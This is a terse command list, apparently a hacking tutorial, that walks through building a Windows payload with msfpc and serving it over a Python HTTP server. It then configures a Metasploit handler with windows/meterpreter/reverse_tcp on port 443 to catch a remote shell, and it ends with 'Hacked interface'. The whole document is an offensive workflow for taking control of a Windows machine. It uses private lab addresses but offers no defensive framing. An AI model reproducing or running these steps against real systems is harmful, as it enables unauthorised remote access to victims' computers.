Commends :
Commends :
1/ msfpc -h
2/ msfpc windows 10.0.2.15 ( local ip )
3/ pwd
4/ ls
5/ python3 -m http.server 8080
search in linux browser in picture marked link or search "localhost"
1/ msfconsole
2/ use exploit/multi/handler
3/ info
4/ options
5/ show payloads
6/ set payload windows/meterpreter/reverse_tcp
7/ set lhost 10.0.2.4 ( ip address )
8/ set lport 443
9/ options
10/ exploit
Hacked interface